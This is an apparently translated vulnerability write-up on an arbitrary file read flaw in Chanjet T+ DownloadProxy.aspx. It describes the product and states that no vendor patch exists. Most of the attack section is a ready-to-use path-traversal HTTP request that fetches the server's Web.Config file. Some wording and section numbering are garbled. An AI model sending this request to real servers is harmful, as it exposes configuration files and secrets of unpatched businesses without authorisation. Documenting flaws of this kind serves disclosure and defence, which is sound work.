Chanjet TPlus DownloadProxy.aspx has an arbitrary file read vulnerability
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Chanjet TPlus DownloadProxy.aspx
Chanjet T+ Dedicated Cloud is suitable for enterprises that need integrated management, such as financial management, business management, retail management, production management, logistics management, mobile warehouse management, marketing management, outsourcing processing and other integrated management of personnel, finance, goods and customers.
2. Vulnerability description
Chanjet T+ Dedicated Cloud is suitable for enterprises that need integrated management, such as financial management, business management, retail management, production management, logistics management, mobile warehouse management, marketing management, outsourcing processing and other integrated management of personnel, finance, goods and customers. The system has an arbitrary file read vulnerability
Three, the impact version
Chanjet T+
5. Vulnerability recurrence
Vulnerability link: http://127.0.0.1/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=…/…/Web.Config
Vulnerability Packet:
GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
6. POC&EXP
Xiaolong POC detection one-pass hala less
Xiaolong POC portal: Xiaolong POC tool
7. Opinions on rectification
At present, the manufacturer has not provided the relevant vulnerability patch link, please pay attention to the manufacturer's homepage for timely updates: https://www.chanjet.com/